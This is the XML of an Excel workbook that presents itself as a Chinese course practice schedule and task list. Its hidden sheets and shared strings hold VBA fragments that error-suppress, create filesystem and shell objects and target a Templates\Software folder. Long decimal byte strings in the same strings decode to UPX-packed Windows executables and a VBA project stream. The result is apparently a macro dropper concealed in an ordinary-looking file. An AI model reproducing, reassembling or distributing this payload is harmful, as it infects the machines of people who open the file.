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NSYMZWYQJPRLPK" sheetId="1" state="hidden" r:id="rId2"/>
    <sheet name="Module1" sheetId="2" state="hidden" r:id="rId3"/>
    <sheet name="20211实践进程表" sheetId="3" state="visible" r:id="rId4"/>
    <sheet name="20211实践任务" sheetId="4" state="visible" r:id="rId5"/>
    <sheet name="11" sheetId="5" state="hidden" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName function="false" hidden="false" localSheetId="4" name="_xlnm.Print_Titles" vbProcedure="false">'11'!$1:$7</definedName>
    <definedName function="false" hidden="true" localSheetId="4" name="_xlnm._FilterDatabase" vbProcedure="false">'11'!$A$7:$D$367</definedName>
    <definedName function="false" hidden="false" localSheetId="2" name="_xlnm.Print_Titles" vbProcedure="false">20211实践进程表!$1:$7</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="Counter" vbProcedure="false">NSYMZWYQJPRLPK!$B$83</definedName>
    <definedName function="false" hidden="false" localSheetId="2" name="Excel_BuiltIn__FilterDatabase" vbProcedure="false">20211实践进程表!$A$9:$F$6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0" uniqueCount="1715">
  <si>
    <t xml:space="preserve">Private Sub addsum()</t>
  </si>
  <si>
    <t xml:space="preserve">208 207 17 224 161 177 26 225 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 62 0 3 0 254 255 9 0 6 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 16 0 0 24 0 0 0 2 0 0 0 254 255 255 255 0 0 0 0 0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77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 200 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 127 83 3 133 59 50 109 214 59 50 109 214 59 50 109 214 211 45 103 214 11 50 109 214 184 46 99 214 50 50 109 214 59 50 108 214 23 50 109 214 89 45 126 214 56 50 109 214 211 45 102 214 62 50 109 214 82 105 99 104 59 50 109 214 0 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 27 156 227 64 0 0 0 0 0 0 0 0 224 0 15 1 11 1 6 0 0 64 0 0 0 16 0 0 0 112 0 0 128 175 0 0 0 128 0 0 0 192 0 0 0 0 64 0 0 16 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 208 0 0 0 16 0 0 0 0 0 0 3 0 0 0 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 192 0 0 116 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 85 80 88 48 0 0 0 0 0 112 0 0 0 16 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 224 85 80 88 49 0 0 0 0 0 64 0 0 0 128 0 0 0 50 0 0 0 4 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 24 1 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 243 250 199 113 146 148 148 113 146 148 148 113 146 148 148 98 154 201 148 115 146 148 148 116 158 155 148 117 146 148 148 116 158 203 148 127 146 148 148 116 158 201 148 117 146 148 148 90 179 179 148 120 146 148 148 139 182 136 148 119 146 148 148 242 142 154 148 112 146 148 148 139 177 141 148 117 146 148 148 242 154 201 148 122 146 148 148 113 146 149 148 7 147 148 148 116 158 244 148 122 146 148 148 157 153 202 148 112 146 148 148 116 158 206 148 112 146 148 148 82 105 99 104 113 146 148 148 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 67 118 101 61 0 0 0 0 0 0 0 0 224 0 15 1 11 1 7 10 0 96 0 0 0 16 0 0 0 192 0 0 224 45 1 0 0 208 0 0 0 48 1 0 0 0 64 0 0 16 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 64 1 0 0 16 0 0 0 0 0 0 2 0 0 0 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 152 52 1 0 0 2 0 0 0 48 1 0 152 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">Dim buf As Byte</t>
  </si>
  <si>
    <t xml:space="preserve">253 255 255 255 23 0 0 0 3 0 0 0 4 0 0 0 5 0 0 0 6 0 0 0 7 0 0 0 8 0 0 0 9 0 0 0 10 0 0 0 11 0 0 0 12 0 0 0 13 0 0 0 14 0 0 0 15 0 0 0 16 0 0 0 17 0 0 0 18 0 0 0 19 0 0 0 20 0 0 0 21 0 0 0 22 0 0 0 254 255 255 255 58 0 0 0 76 0 0 0 26 0 0 0 27 0 0 0 28 0 0 0 29 0 0 0 30 0 0 0 31 0 0 0 32 0 0 0 59 0 0 0 34 0 0 0 35 0 0 0 36 0 0 0 48 0 0 0 38 0 0 0 39 0 0 0 40 0 0 0 41 0 0 0 42 0 0 0 43 0 0 0 44 0 0 0 45 0 0 0 46 0 0 0 47 0 0 0 33 0 0 0 49 0 0 0 50 0 0 0 51 0 0 0 52 0 0 0 53 0 0 0 54 0 0 0 55 0 0 0 56 0 0 0 57 0 0 0 254 255 255 255 78 0 0 0 60 0 0 0 61 0 0 0 62 0 0 0 63 0 0 0 64 0 0 0 74 0 0 0 66 0 0 0 67 0 0 0 68 0 0 0 69 0 0 0 70 0 0 0 71 0 0 0 72 0 0 0 73 0 0 0 254 255 255 255 75 0 0 0 77 0 0 0 254 255 255 255 79 0 0 0 86 0 0 0 80 0 0 0 81 0 0 0 82 0 0 0 83 0 0 0 84 0 0 0 85 0 0 0 87 0 0 0 254 255 255 255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0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 224 85 80 88 50 0 0 0 0 0 16 0 0 0 192 0 0 0 2 0 0 0 54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130 93 234 233 175 56 171 137 32 132 0 0 121 47 0 0 0 128 0 0 38 3 0 4 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 85 80 88 48 0 0 0 0 0 192 0 0 0 16 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 224 85 80 88 49 0 0 0 0 0 96 0 0 0 208 0 0 0 96 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 224 46 114 115 114 99 0 0 0 0 16 0 0 0 48 1 0 0 8 0 0 0 100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63 61 203 179 126 49 145 194 83 14 1 0 224 93 0 0 0 0 1 0 38 6 0 5 </t>
  </si>
  <si>
    <t xml:space="preserve">On Error Resume Next</t>
  </si>
  <si>
    <t xml:space="preserve">82 0 111 0 111 0 116 0 32 0 69 0 110 0 116 0 114 0 121 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 22 0 5 0 255 255 255 255 255 255 255 255 2 0 0 0 32 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 0 0 0 0 96 76 254 176 186 220 196 1 112 199 144 51 206 106 196 1 25 0 0 0 128 49 0 0 0 0 0 0 87 0 111 0 114 0 107 0 98 0 111 0 111 0 107 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 18 0 2 1 18 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 142 41 0 0 0 0 0 0 95 0 86 0 66 0 65 0 95 0 80 0 82 0 79 0 74 0 69 0 67 0 84 0 95 0 67 0 85 0 82 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 34 0 1 1 1 0 0 0 16 0 0 0 15 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 208 140 96 22 206 106 196 1 128 182 244 22 206 106 196 1 0 0 0 0 0 0 0 0 0 0 0 0 86 0 66 0 65 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 8 0 1 0 255 255 255 255 255 255 255 255 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 48 59 107 22 206 106 196 1 128 23 208 22 206 106 196 1 0 0 0 0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">237 255 255 255 131 236 52 139 68 36 60 83 85 86 139 72 4 87 51 246 104 64 112 64 0 81 137 116 36 44 198 22 190 221 253 255 27 16 232 3 0 7 102 139 232 106 1 106 44 85 11 6 186 85 10 141 84 36 48 125 123 183 219 5 82 14 5 210 59 56 37 255 0 0 193 224 2 80 177 177 255 246 17 196 71 248 106 76 85 137 124 36 116 47 86 20 119 255 59 247 137 132 36 132 36 45 76 131 196 56 132 192 118 36 139 223 73 106 4 83 255 251 219 97 69 36 23 16 139 200 70 129 225 76 131 195 4 59 241 124 109 231 254 237 222 51 219 41 137 92 36 28 15 134 143 20 82 32 139 122 111 103 183 219 32 106 70 2 64 110 9 80 144 139 170 88 141 139 246 118 108 236 0 2 0 181 60 110 139 203 132 139 209 137 85 253 247 255 254 92 193 233 2 243 165 224 139 202 131 225 3 80 243 164 31 185 139 76 36 96 187 110 246 215 126 104 53 141 20 11 202 20 68 41 64 131 158 237 182 219 193 4 139 36 137 13 32 17 20 64 145 129 195 110 237 205 253 43 59 193 83 142 140 117 255 0 134 106 48 181 73 62 16 18 68 106 4 76 28 89 190 172 219 160 5 244 50 80 35 76 36 72 81 120 219 222 54 47 80 18 42 116 18 80 137 148 251 111 135 69 29 133 124 126 72 139 193 153 129 226 255 1 20 27 54 247 118 3 194 202 193 255 9 133 12 128 2 44 121 195 255 190 253 8 73 129 201 0 254 128 65 116 5 71 16 139 247 193 230 9 86 177 179 127 107 190 64 196 28 126 65 139 216 193 225 9 81 124 118 216 194 13 90 133 255 126 2 243 243 86 132 161 219 208 29 40 172 92 80 4 144 216 44 85 55 252 221 45 50 28 129 198 42 79 117 202 97 40 51 192 221 112 239 222 59 240 251 3 32 15 142 230 173 21 12 3 124 255 115 191 3 84 3 2 102 137 113 117 131 192 4 129 249 133 26 137 215 185 193 54 166 117 79 32 4 23 34 56 21 110 182 237 195 28 192 138 76 52 136 51 36 36 43 209 241 239 46 28 104 7 16 252 25 28 246 198 1 116 22 191 48 187 191 247 223 129 141 52 3 51 210 243 </t>
  </si>
  <si>
    <t xml:space="preserve">253 238 255 255 184 120 181 64 0 195 86 106 0 139 241 232 6 0 135 88 199 6 152 16 139 198 94 195 199 1 115 191 127 247 9 233 20 94 194 4 0 255 116 36 4 32 100 89 12 47 220 236 255 88 45 0 22 246 68 36 8 1 116 7 86 25 53 223 126 215 238 28 184 35 160 54 16 138 76 129 236 4 1 36 83 87 139 249 246 219 255 127 31 112 255 112 16 51 219 106 1 83 255 21 220 176 33 59 195 137 135 164 29 198 54 155 251 0 15 132 172 5 19 224 61 183 16 155 231 110 123 103 49 35 241 133 192 12 142 18 86 104 212 223 253 191 116 100 106 200 137 77 240 59 203 137 93 252 116 9 17 1 69 139 240 235 119 255 255 255 2 51 246 131 77 252 255 137 119 32 106 63 136 157 240 254 255 255 51 192 89 141 189 241 8 243 171 102 109 251 123 216 171 170 126 141 133 27 104 88 182 106 80 113 46 111 237 191 52 232 6 131 196 12 83 0 148 53 56 179 141 141 181 247 191 197 32 107 207 0 81 83 139 206 255 144 56 192 8 221 127 119 247 64 118 4 71 189 94 108 192 139 77 244 95 91 100 137 13 148 0 92 142 112 248 201 195 184 8 183 66 64 137 26 48 183 32 188 251 134 9 233 20 32 184 108 182 101 36 219 119 59 63 117 197 206 94 24 38 18 1 54 178 67 120 184 54 63 81 246 121 89 155 108 219 59 6 69 248 5 133 131 120 128 60 33 144 1 87 131 124 253 246 182 91 186 2 32 117 20 127 104 48 117 46 106 100 255 118 32 55 172 97 179 255 48 235 17 216 8 128 192 236 194 111 219 38 100 64 53 8 0 85 139 236 191 0 2 127 246 194 221 127 137 44 131 125 8 100 116 6 5 101 117 65 208 106 127 89 37 89 48 11 133 203 106 0 103 1 240 21 12 15 104 244 46 100 21 80 221 48 67 217 230 132 177 90 16 17 240 102 204 45 148 180 57 201 148 94 40 63 219 27 110 152 53 208 250 87 255 117 8 40 220 255 214 139 238 183 195 220 61 212 18 14 215 26 12 198 132 5 221 12 221 135 197 118 19 216 253 34 8 215 106 30 27 217 246 63 108 159 253 69 224 224 80 57 164 139 69 16 131 </t>
  </si>
  <si>
    <t xml:space="preserve">Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t xml:space="preserve">9 8 16 0 0 6 5 0 222 30 205 7 201 128 0 0 6 2 0 0 225 0 2 0 176 4 193 0 2 0 0 0 226 0 0 0 92 0 112 0 4 0 0 119 111 114 107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66 0 2 0 176 4 97 1 2 0 0 0 192 1 0 0 61 1 2 0 6 0 211 0 0 0 186 1 15 0 12 0 0 84 104 105 115 87 111 114 107 98 111 111 107 156 0 2 0 14 0 25 0 2 0 0 0 18 0 2 0 0 0 19 0 2 0 0 0 175 1 2 0 0 0 188 1 2 0 0 0 61 0 18 0 240 0 60 0 92 58 102 33 57 0 0 0 0 0 1 0 88 2 64 0 2 0 0 0 141 0 2 0 0 0 34 0 2 0 0 0 14 0 2 0 1 0 183 1 2 0 0 0 218 0 2 0 0 0 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 240 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 20 0 180 0 0 0 255 127 144 1 0 0 0 0 134 0 2 1 139 91 83 79 49 0 46 0 240 0 0 0 255 127 144 1 0 0 0 1 0 0 15 1 84 0 105 0 109 0 101 0 115 0 32 0 78 0 101 0 119 0 32 0 82 0 111 0 109 0 97 0 110 0 30 4 43 0 5 0 19 0 1 34 0 229 255 34 0 35 0 44 0 35 0 35 0 48 0 59 0 </t>
  </si>
  <si>
    <t xml:space="preserve">166 116 20 36 128 3 193 3 122 59 198 26 11 110 247 124 135 235 107 19 56 139 249 169 6 34 223 253 31 16 41 193 248 9 139 208 193 226 9 43 202 76 60 59 215 125 25 219 255 191 117 57 76 74 150 131 62 253 116 1 67 59 216 116 8 66 131 198 4 24 124 37 220 253 132 238 164 139 20 144 66 47 3 209 82 165 206 108 216 182 24 39 5 80 4 4 175 106 191 216 102 132 76 178 185 68 82 9 43 3 162 183 47 152 15 90 3 76 26 95 94 93 91 8 52 195 47 252 239 186 144 0 86 114 8 87 131 207 255 139 70 12 168 64 162 131 200 255 124 103 250 254 235 58 168 131 116 52 86 47 221 29 7 9 131 255 118 16 219 178 125 219 8 208 54 12 133 192 125 37 207 18 49 28 118 251 255 110 11 116 11 123 8 161 131 102 28 0 89 139 199 6 12 0 94 220 175 240 216 195 85 133 246 117 231 152 66 89 17 237 45 182 197 78 47 89 98 15 246 70 13 109 182 246 246 179 15 86 9 174 247 216 34 27 192 195 154 24 83 166 146 91 248 59 12 39 87 144 96 4 199 111 11 255 128 249 2 117 55 102 169 8 106 49 18 8 139 62 43 248 28 255 189 121 118 38 87 80 146 10 5 59 199 117 14 191 128 116 14 36 253 210 214 253 183 137 8 235 7 131 78 12 32 131 203 212 8 145 4 138 203 205 10 255 6 95 139 195 94 91 195 40 142 100 58 199 95 248 155 99 51 255 57 53 192 139 189 126 77 161 184 123 64 86 225 194 23 92 176 208 170 72 12 246 193 1 48 131 178 247 237 17 126 16 1 117 15 80 62 131 248 255 186 29 67 235 26 21 253 203 218 246 0 117 19 33 2 108 26 117 2 11 248 70 59 91 184 197 142 76 124 179 56 112 116 2 15 95 117 251 173 223 189 85 139 236 81 112 139 125 12 15 175 125 52 69 8 137 125 252 194 27 182 91 109 137 7 83 117 7 242 233 163 160 139 182 45 219 246 117 20 102 247 184 12 228 8 24 27 20 194 88 106 174 219 199 4 0 16 131 201 76 8 246 70 183 237 47 116 41 25 4 159 34 23 139 251 114 91 223 240 119 255 248 87 255 117 8 255 54 130 13 </t>
  </si>
  <si>
    <t xml:space="preserve">101 224 183 225 123 219 236 69 228 68 8 232 48 8 236 240 125 179 253 157 41 80 102 199 69 240 149 2 146 236 247 216 27 192 95 107 155 147 173 245 151 12 36 83 86 224 188 198 55 30 159 181 92 40 115 243 137 117 248 143 93 110 141 221 16 226 87 83 34 6 4 83 200 231 93 251 207 182 26 86 33 96 248 59 251 137 125 244 171 15 100 204 246 240 73 57 4 64 184 65 80 135 240 237 17 115 236 126 83 80 183 161 118 134 27 102 251 217 240 80 23 80 106 5 87 53 104 242 117 172 109 207 133 19 17 100 181 214 248 248 4 71 236 221 109 91 208 240 21 196 170 136 156 5 48 54 222 210 219 22 29 131 146 89 126 16 98 61 50 247 47 188 29 42 49 215 235 110 157 136 93 220 141 125 221 171 0 215 182 96 6 151 45 16 220 48 200 182 134 183 221 89 133 118 27 126 252 80 86 119 244 121 108 9 115 255 71 116 59 3 125 252 43 117 252 117 229 20 81 194 251 115 251 15 190 69 220 80 38 200 180 89 116 14 141 14 176 118 110 225 191 201 170 89 89 95 94 210 195 50 169 3 195 248 182 253 27 64 15 182 69 8 72 116 28 72 3 17 2 7 104 72 227 105 150 102 235 103 19 6 230 12 229 5 132 131 108 101 228 65 12 93 195 119 27 134 133 114 44 1 183 212 123 98 8 102 83 99 51 176 216 87 210 133 212 84 248 32 77 208 213 190 0 32 3 118 157 13 211 255 214 137 56 139 93 8 139 59 20 45 212 221 126 44 188 52 138 67 4 134 248 7 4 77 167 212 80 93 11 166 155 24 189 172 118 20 84 133 219 237 47 152 156 82 232 43 199 59 198 137 198 127 3 63 8 30 142 236 58 27 216 184 176 180 208 133 182 134 198 214 116 236 115 84 3 87 63 180 214 149 94 70 12 87 117 88 182 254 83 19 59 247 235 204 184 26 188 46 125 12 93 22 137 55 190 238 15 134 83 85 230 81 60 255 55 9 83 229 176 23 218 205 253 111 69 248 64 115 127 4 166 3 184 164 206 254 118 187 15 133 77 16 33 137 1 203 50 235 30 74 89 125 183 181 247 62 16 51 83 32 169 16 199 0 113 23 244 154 52 161 44 105 </t>
  </si>
  <si>
    <t xml:space="preserve">Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t xml:space="preserve">34 0 229 255 34 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 30 4 53 0 6 0 24 0 1 34 0 229 255 34 0 35 0 44 0 35 0 35 0 48 0 59 0 91 0 82 0 101 0 100 0 93 0 34 0 229 255 34 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 30 4 55 0 7 0 25 0 1 34 0 229 255 34 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 59 0 34 0 229 255 34 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 30 4 65 0 8 0 30 0 1 34 0 229 255 34 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 59 0 91 0 82 0 101 0 100 0 93 0 34 0 229 255 34 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 30 4 105 0 42 0 50 0 1 95 0 32 0 34 0 229 255 34 0 42 0 32 0 35 0 44 0 35 0 35 0 48 0 95 0 32 0 59 0 95 0 32 0 34 0 229 255 34 0 42 0 32 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 95 0 32 0 59 0 95 0 32 0 34 0 229 255 34 0 42 0 32 0 34 0 45 0 34 0 95 0 32 0 59 0 95 0 32 0 64 0 95 0 32 0 30 4 46 0 41 0 41 0 0 95 32 42 32 35 44 35 35 48 95 32 59 95 32 42 32 92 45 35 44 35 35 48 95 32 59 95 32 42 32 34 45 34 95 32 59 95 32 64 95 32 30 4 121 0 44 0 58 0 1 95 0 32 0 34 0 229 255 34 0 42 0 32 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 95 0 32 0 59 0 95 0 32 0 34 0 229 255 34 0 42 0 32 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 95 0 32 0 59 0 95 0 32 0 34 0 229 255 34 0 42 0 32 0 34 0 45 0 34 0 63 0 63 0 95 0 32 0 59 0 95 0 32 0 64 0 95 0 32 0 30 4 54 0 43 0 49 0 0 95 32 42 32 35 44 35 35 48 46 48 48 95 32 </t>
  </si>
  <si>
    <t xml:space="preserve">140 41 126 4 1 62 155 43 223 1 125 8 251 36 148 255 235 70 59 93 20 114 70 133 201 117 117 121 131 125 78 189 181 141 118 116 13 149 166 247 107 64 43 250 235 221 45 33 178 66 251 71 201 116 71 1 222 189 93 184 152 43 216 81 114 62 176 252 235 41 174 86 15 190 0 185 239 17 254 233 12 107 89 5 46 255 69 164 75 165 205 245 187 183 89 127 167 157 0 133 219 15 133 80 103 48 134 214 14 187 16 244 201 195 129 11 65 4 49 110 11 177 43 116 149 231 93 36 4 45 18 222 116 134 89 138 12 8 16 211 89 89 34 194 155 97 59 93 95 207 33 127 137 77 8 34 30 228 74 14 6 159 12 235 3 139 242 39 12 214 39 27 42 36 35 59 200 139 249 67 40 76 120 54 83 34 24 37 249 195 194 223 3 223 218 75 59 77 37 46 22 139 193 116 9 56 242 140 63 193 43 194 80 83 235 18 14 116 54 8 31 190 124 20 55 41 3 216 235 24 79 17 53 5 118 115 109 247 40 136 3 134 67 255 121 138 69 8 0 254 219 8 95 200 118 16 235 4 4 199 91 43 120 76 122 104 62 0 229 109 170 75 91 161 220 95 111 139 64 91 10 92 1 59 220 27 77 20 255 229 93 36 239 11 191 117 13 38 52 182 127 104 21 160 1 68 33 89 164 197 190 125 238 232 53 89 225 7 36 252 20 168 52 16 168 8 116 248 106 11 55 170 196 4 34 199 137 252 87 189 219 60 107 83 20 190 21 6 51 201 170 15 149 193 73 76 134 141 191 216 235 13 199 5 144 118 157 22 170 128 214 125 219 153 163 36 24 104 224 117 1 195 80 54 16 3 102 193 236 26 38 22 248 161 64 253 131 217 189 12 3 78 7 70 166 106 255 104 176 96 247 134 187 189 70 104 128 49 4 100 161 76 26 100 137 37 7 115 191 97 137 153 16 194 137 101 232 255 21 4 33 244 207 160 228 126 138 212 137 21 168 114 197 147 137 13 217 22 10 184 164 13 230 73 202 10 160 119 127 208 253 232 16 163 156 7 106 74 32 71 89 140 8 106 28 217 126 151 29 105 8 125 101 252 21 30 156 77 88 29 251 206 180 163 196 89 15 29 106 163 128 118 </t>
  </si>
  <si>
    <t xml:space="preserve">153 152 212 46 180 173 59 109 87 74 33 198 133 163 98 15 210 212 1 89 139 255 139 62 141 20 102 191 9 31 17 70 4 14 207 117 13 23 128 116 175 236 228 204 176 12 246 220 119 178 93 247 216 133 219 38 16 123 33 24 122 235 41 223 107 182 255 118 139 7 83 248 131 232 5 80 131 198 5 86 45 168 83 177 151 253 240 52 112 32 93 131 39 0 164 40 193 192 225 8 207 216 0 206 145 199 187 230 104 102 216 173 135 162 171 217 254 224 198 133 33 126 139 48 53 64 4 30 206 210 87 127 33 81 37 117 191 216 132 142 3 105 216 16 167 20 23 219 223 118 132 120 7 79 13 236 43 198 191 0 40 14 59 221 187 84 248 199 126 2 139 199 27 97 137 6 61 223 216 200 103 33 36 214 76 252 83 100 51 52 15 83 117 49 54 193 218 184 66 115 141 183 87 94 218 86 183 65 104 20 22 180 213 175 53 214 206 126 254 38 0 140 91 255 254 131 182 217 132 173 70 251 220 164 255 247 224 248 212 142 80 70 198 4 177 67 141 94 249 76 147 158 14 172 86 87 71 39 60 157 218 7 235 42 128 62 61 63 56 5 93 115 69 138 46 11 215 41 89 193 12 131 227 199 7 4 199 8 23 131 183 109 187 167 92 36 91 3 111 116 6 87 141 126 12 128 116 19 94 101 229 73 87 188 183 65 59 131 35 199 48 32 65 66 228 96 52 39 180 32 86 85 224 254 118 97 11 242 225 254 22 33 11 106 7 202 196 6 187 3 190 28 47 51 210 60 247 210 183 101 216 174 118 107 202 215 157 55 75 84 157 133 130 129 10 132 191 224 191 97 192 34 3 11 182 202 128 60 24 92 117 17 188 193 118 96 20 89 179 24 159 3 104 223 59 107 47 51 175 23 2 116 103 98 255 125 43 180 183 109 1 82 57 5 114 164 91 134 194 1 194 99 201 70 127 232 124 8 205 193 17 186 211 4 5 139 14 16 81 246 3 55 187 8 36 196 176 76 36 16 234 37 138 232 87 18 134 130 225 5 118 99 194 182 169 171 117 36 131 235 87 139 191 82 100 58 14 155 52 11 88 184 63 140 20 144 130 94 93 114 254 165 95 18 237 30 0 106 42 83 170 68 </t>
  </si>
  <si>
    <t xml:space="preserve">myfolder = w.SpecialFolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t xml:space="preserve">59 95 32 42 32 92 45 35 44 35 35 48 46 48 48 95 32 59 95 32 42 32 34 45 34 63 63 95 32 59 95 32 64 95 32 30 4 26 0 23 0 21 0 0 92 36 35 44 35 35 48 95 41 59 92 40 92 36 35 44 35 35 48 92 41 30 4 31 0 24 0 26 0 0 92 36 35 44 35 35 48 95 41 59 91 82 101 100 93 92 40 92 36 35 44 35 35 48 92 41 30 4 32 0 25 0 27 0 0 92 36 35 44 35 35 48 46 48 48 95 41 59 92 40 92 36 35 44 35 35 48 46 48 48 92 41 30 4 37 0 26 0 32 0 0 92 36 35 44 35 35 48 46 48 48 95 41 59 91 82 101 100 93 92 40 92 36 35 44 35 35 48 46 48 48 92 41 30 4 11 0 176 0 6 0 0 48 48 48 48 48 48 30 4 27 0 177 0 11 0 1 34 0 47 102 34 0 59 0 34 0 47 102 34 0 59 0 34 0 38 84 34 0 30 4 27 0 178 0 11 0 1 34 0 31 119 34 0 59 0 34 0 31 119 34 0 59 0 34 0 71 80 34 0 30 4 27 0 179 0 11 0 1 34 0 0 95 34 0 59 0 34 0 0 95 34 0 59 0 34 0 115 81 34 0 224 0 20 0 0 0 0 0 245 255 32 0 0 0 0 0 0 0 0 0 0 0 192 32 224 0 20 0 1 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 1 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 2 0 0 0 245 255 32 0 0 244 0 0 0 0 0 0 0 0 192 32 224 0 20 0 2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t>
  </si>
  <si>
    <t xml:space="preserve">9 27 29 155 219 188 219 4 26 100 19 20 4 161 184 163 188 4 202 53 92 225 183 185 176 6 5 172 37 207 247 144 183 54 222 122 23 160 228 80 39 63 69 236 139 60 9 237 58 190 55 85 224 80 81 254 224 122 139 176 117 224 110 201 93 224 30 107 61 136 53 215 5 13 114 123 15 198 34 84 172 34 141 104 188 134 68 112 13 54 132 185 47 36 89 37 8 102 183 13 203 172 254 4 86 216 36 30 93 3 127 133 86 230 130 36 73 89 11 106 159 128 225 232 50 221 122 64 45 12 242 85 250 196 23 119 221 12 59 61 160 133 15 131 134 122 199 112 11 188 209 39 248 22 230 31 141 101 160 44 227 141 111 148 52 111 3 246 68 48 194 116 105 87 134 216 147 49 178 46 22 60 61 22 106 2 22 229 177 22 165 89 255 31 89 59 197 107 48 219 179 28 43 89 80 108 20 98 10 9 251 93 106 102 16 36 154 51 237 29 45 156 88 15 74 91 123 89 128 100 89 29 237 8 39 70 247 70 249 44 41 89 235 21 100 131 37 148 236 0 58 99 246 96 114 9 61 225 199 71 218 232 56 29 133 25 116 8 216 102 129 70 129 237 6 0 247 251 58 89 114 165 112 208 74 165 25 139 221 186 58 104 252 54 194 5 217 115 61 10 240 249 108 179 157 223 213 226 31 139 12 141 208 209 37 80 164 83 55 57 153 24 8 162 192 131 240 35 97 111 18 163 134 133 139 129 236 20 222 77 173 250 12 251 83 59 13 95 69 230 74 110 46 59 121 1 193 139 241 138 90 6 220 75 52 15 132 87 33 248 102 148 62 